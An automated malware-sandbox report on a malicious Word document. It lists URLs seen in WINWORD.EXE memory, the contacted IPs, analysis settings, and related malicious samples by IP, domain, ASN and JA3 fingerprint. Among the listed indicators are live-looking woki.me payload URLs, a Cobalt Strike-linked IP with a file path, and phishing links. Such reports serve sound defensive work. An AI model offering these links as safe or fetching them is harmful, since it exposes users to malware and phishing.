                                                                    		unknown
                                                                    https://wus2.pagecontentsync.onenote.com/pagecontentsync/attachment/v1nc/attachment/v1UahWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://api.powerbi.com/v1.0/myorg/groupsWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://web.microsoftstream.com/video/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://login.windows.net/common/oauth2/authorize6icWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://graph.windows.netWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://login.windows.net/common/oauth2/authorizeogWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://contacts.msn.com/ABService/ABService.asmx.asmxWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileUwgWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://officepyservice.office.net/&WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://woki.me/DQaKj/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003578634.000001D79BACC000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003936689.000001D79BD67000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3003494409.000001D79BA32000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechechWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://substrate.office.com/recommended/api/v1.0/edgeworthPqgWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://outlook.office365.com/tasks?app&hostApp=metaOSHubivityFeedStateytKWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://notification.m365.svc.cloud.microsoft/PushNotifications.RegisterWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://d.docs.live.netWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://support.office.com/client/results?fullframe=yesWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://docs.live.net/SharingService.svcvice.svcrWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://clients.config.office.net/user/v1.0/android/policies)~WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://templates.office.com/templates-for-powerpoint?ocid=oo_toc_client_app_MARVEL_UPS_templates_goWINWORD.EXE, 00000000.00000002.2999370908.000001D796490000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://templates.office.com/templates-for-word?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiuWINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://mss.office.comWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://substrate.office.com#TWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://directory.services.live.com/profile/Profile.asmx.asmxgWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://clients.config.office.net/user/v1.0/iosWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2onWINWORD.EXE, 00000000.00000002.2998895883.000001D78EFD6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://login.windows.net/common/oauth2/authorizeXWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://incidents.diagnostics.office.comomWINWORD.EXE, 00000000.00000002.2999370908.000001D796376000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://notification.m365.svc.cloud.microsoft/api/v1/registertfreeformspeechWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://account.box.com/api/wopibootstrapperem4vekradyd8j4setf04baizn2np7btjhttps://www.box.com/offiWINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://insertmedia.bing.office.net/odc/insertmediaupdPWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://login.windows.net/common/oauth2/authorizesgicWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://www.office.com/8KRWINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://dataservice.protWINWORD.EXE, 00000000.00000002.3001506401.000001D79A554000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              		unknown
                                                                                                                              https://clients.config.office.net/user/v1.0/android/policiesWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://templates.office.com/templates-for-excel?ocid=oo_toc_client_app_MARVEL_UPS_templates_gopremiWINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeWWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmp, WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://outlook.live.com/owa/wopibootstrapperNAWINWORD.EXE, 00000000.00000002.3002531255.000001D79B48D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://schemas.microWINWORD.EXE, 00000000.00000002.3001126261.000001D799940000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeHWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://woki.me/qakjWINWORD.EXE, 00000000.00000002.3009141410.000001D79C4E1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://api.onedrive.com/v1.0/v1.0WINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://outlook.office.com/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A500000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://clients.config.office.net/user/v1.0/macjWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://storage.live.com/clientlogs/uploadlocationWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeecheWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://cr.office.comFWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://outlook.office.comS.DLLWINWORD.EXE, 00000000.00000002.3001506401.000001D79A429000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://api.powerbi.com/v1.0/myorg/importsspxtWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://login.microsoftonline.comWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://login.windows.net/common/oauth2/authorizetinfoWINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://prod.mds.office.com/mds/api/v1.0/clientmodeldirectorybpQWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://realtimesync.onenote.com/realtimechannel/v1.0/signalr/hubv1.0/signalr/hubEWINWORD.EXE, 00000000.00000002.3001506401.000001D79A5CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown
                                                                                                                                                            https://substrate.office.com/search/api/v1/WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://login.windows.net/common/oauth2/authorize8WINWORD.EXE, 00000000.00000002.3001506401.000001D79A465000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                		high

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                142.132.211.198
                                                                                                                                                                		woki.meCanada
                                                                                                                                                                		22686UNIVERSITYOFWINNIPEG-ASNCAfalse
                                                                                                                                                                67.217.247.193
                                                                                                                                                                		unknownUnited States
                                                                                                                                                                		7381SRS-6-Z-7381UStrue
                                                                                                                                                                2.22.242.9
                                                                                                                                                                		a726.dscd.akamai.netEuropean Union
                                                                                                                                                                		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                Analysis ID:1616494
                                                                                                                                                                Start date and time:2025-02-16 21:04:35 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 5m 44s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 11 23H2 with Office Professional Plus 2021, Chrome 131, Firefox 133, Adobe Reader DC 24, Java 8 Update 431, 7zip 24.09
                                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                                Number of analysed new started processes analysed:26
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:NCR2025-000455.docx.doc
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal64.expl.evad.winDOC@4/6@2/3
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .doc
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Unable to detect Microsoft Word
                                                                                                                                                                • Close Viewer
                                                                                                                                                                • Corrupt sample or wrongly selected analyzer.
                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SystemSettingsBroker.exe, SIHClient.exe, appidcertstorecheck.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.109.28.46, 52.109.68.130, 13.78.111.198, 52.109.76.243, 20.189.173.22, 2.20.142.24, 2.20.143.50, 52.123.129.14, 40.126.31.73, 52.149.20.212, 20.3.187.198
                                                                                                                                                                • Excluded domains from analysis (whitelisted): odc.officeapps.live.com, slscr.update.microsoft.com, europe.odcsm1.live.com.akadns.net, templatesmetadata.office.net.edgekey.net, onedscolprdjpe00.japaneast.cloudapp.azure.com, onedsblobprdwus17.westus.cloudapp.azure.com, eur.roaming1.live.com.akadns.net, mobile.events.data.microsoft.com, neu-azsc-000.roaming.officeapps.live.com, roaming.officeapps.live.com, dual-s-0005-office.config.skype.com, login.live.com, blobcollectorcommon.trafficmanager.net, officeclient.microsoft.com, templatesmetadata.office.net, c.pki.goog, ecs.office.com, prod.configsvc1.live.com.akadns.net, frc-azsc-000.odc.officeapps.live.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, res-stls-prod.edgesuite.net, fe3cr.delivery.mp.microsoft.com, watson.events.data.microsoft.com, e26769.dscb.akamaiedge.net, config.officeapps.live.com, osiprod-frc-bronze-azsc-000.francecentral.cloudapp.azure.com, osiprod-neu-buff-azsc-000.northeurope.cloudapp.azure.com, metadata.te
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtSetValueKey calls found.
                                                                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                15:05:51API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                142.132.211.198Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                  Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                    Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                      PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                        PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                          PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                            SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  67.217.247.193nicepersonwithgoodheartalwaysgethurt.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                  • 67.217.247.193/318/seemebestthingsforentirelifegoodfo.gIF
                                                                                                                                                                                  2.22.242.9ID_60232912649455456988.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                    https://eur01.safelinks.protection.outlook.com/ap/w-59584e83/?url=https%3A%2F%2Finnerworks621-my.sharepoint.com%2F%3Aw%3A%2Fg%2Fpersonal%2Ffbayoumi_iwexpress_com%2FEV18-ULK3bBFgswwIocxhGgB_RycisFJYnuNE85X0INcoQ%3Fe%3DPJWGhb&data=05%7C02%7Cm.schwarzfaerber%40gutmann.de%7Cba71d958cbce4017fe2b08dd4c1498cf%7Cb8afaafb131d4ce28085e6ff7718d438%7C0%7C0%7C638750373515189602%7CUnknown%7CTWFpbGZsb3d8eyJFbXB0eU1hcGkiOnRydWUsIlYiOiIwLjAuMDAwMCIsIlAiOiJXaW4zMiIsIkFOIjoiTWFpbCIsIldUIjoyfQ%3D%3D%7C0%7C%7C%7C&sdata=jFoC7e8%2BnChKZDPYgfO8Z0D6BEVH0spDWEnRRVzuauE%3D&reserved=0Get hashmaliciousUnknownBrowse
                                                                                                                                                                                      https://herbertgschwend-my.sharepoint.com/:u:/g/personal/hg_gschwend-immobilien_de/EXS9Sw4TFC5Inr36Wv80H7EB-SinU6tgDzHWjKCYjfZgDw?e=QtSQPgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                        Statement 01-28-25.xlsxGet hashmaliciousUnknownBrowse

                                                                                                                                                                                          Domains

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          woki.meContract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          a726.dscd.akamai.netceperson.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.80
                                                                                                                                                                                          ID_60232912649455456988.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          Law Office of Kaylin Pelletier.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.145
                                                                                                                                                                                          Technical_Requirements_for_Hosting.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.114
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.128
                                                                                                                                                                                          Action Required Review__Sign 2025 Q1 ELECTRONIC FUNDING REF_ID 8258068911.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.144
                                                                                                                                                                                          Joren Vercruyssen heeft de map 'Betaling carrosserie' met u gedeeld.msgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 2.22.242.137
                                                                                                                                                                                          Zam#U00f3wienia_G1_13_02_25_005623900883.eml (149 MB).msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.122
                                                                                                                                                                                          PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.22.242.136
                                                                                                                                                                                          Febrero 2025.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.16.164.40
                                                                                                                                                                                          s-0005.dual-s-msedge.netceperson.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.128.14
                                                                                                                                                                                          ceperson.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.129.14
                                                                                                                                                                                          nested-PO01294175 Inv#53068.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.129.14
                                                                                                                                                                                          ID_60232912649455456988.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 52.123.129.14
                                                                                                                                                                                          Law Office of Kaylin Pelletier.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.128.14
                                                                                                                                                                                          Technical_Requirements_for_Hosting.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.128.14
                                                                                                                                                                                          Technical_Requirements_for_Hosting.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.128.14
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.128.14
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 52.123.128.14

                                                                                                                                                                                          ASNs

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          UNIVERSITYOFWINNIPEG-ASNCAContract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          SRS-6-Z-7381USnicepersonwithgoodheartalwaysgethurt.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                                          • 67.217.247.193
                                                                                                                                                                                          asdasdasdasd.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          asdasdasdasd.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          createdbestthingswithbetterwaysgivemebestfor.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          DHL_ documentos.pdf_987654576879808677967332.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          DHL_ documentos.pdf_987654576879808677967332.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          DHL_ documentos.pdf_987654576879808677967332.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          seethebestthingsaroundmeroundme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          ordin de plat#U0103.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 66.179.210.19
                                                                                                                                                                                          AKAMAI-ASN1EUHilix.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 23.63.94.35
                                                                                                                                                                                          Setup.exeGet hashmaliciousACR StealerBrowse
                                                                                                                                                                                          • 23.209.72.40
                                                                                                                                                                                          PURCHASE_ORDER_NO_D000504.cmdGet hashmaliciousDBatLoader, MassLogger RATBrowse
                                                                                                                                                                                          • 2.22.242.82
                                                                                                                                                                                          http://www.pra-me.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 95.101.182.74
                                                                                                                                                                                          https://steanmcommurnlty.com/gift/762726Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 23.197.127.21
                                                                                                                                                                                          http://okok0-3uujff.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                          • 2.22.61.163
                                                                                                                                                                                          http://aus-track-re.com/Australia-Post/track/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 2.18.96.221
                                                                                                                                                                                          sora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 2.21.229.47
                                                                                                                                                                                          sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                          • 23.215.11.56
                                                                                                                                                                                          https://cards50.sbs/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 95.101.149.47

                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                          258a5a1e95b8a911872bae9081526644Technical_Requirements_for_Hosting.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          Contract-Draft.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          PO-989-34 MT.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          SecuriteInfo.com.Heur.25555.7765.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          Febrero 2025.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          PO-KA2982202115-26.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          SWIFT COPY.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          New Work Order- MIS Software For Labels & Packaging.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          asdasdasdasd.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9
                                                                                                                                                                                          AWB Number 490104998518.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                          • 142.132.211.198
                                                                                                                                                                                          • 2.22.242.9

                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                          No context

                                                                                                                                                                                          Created / dropped Files

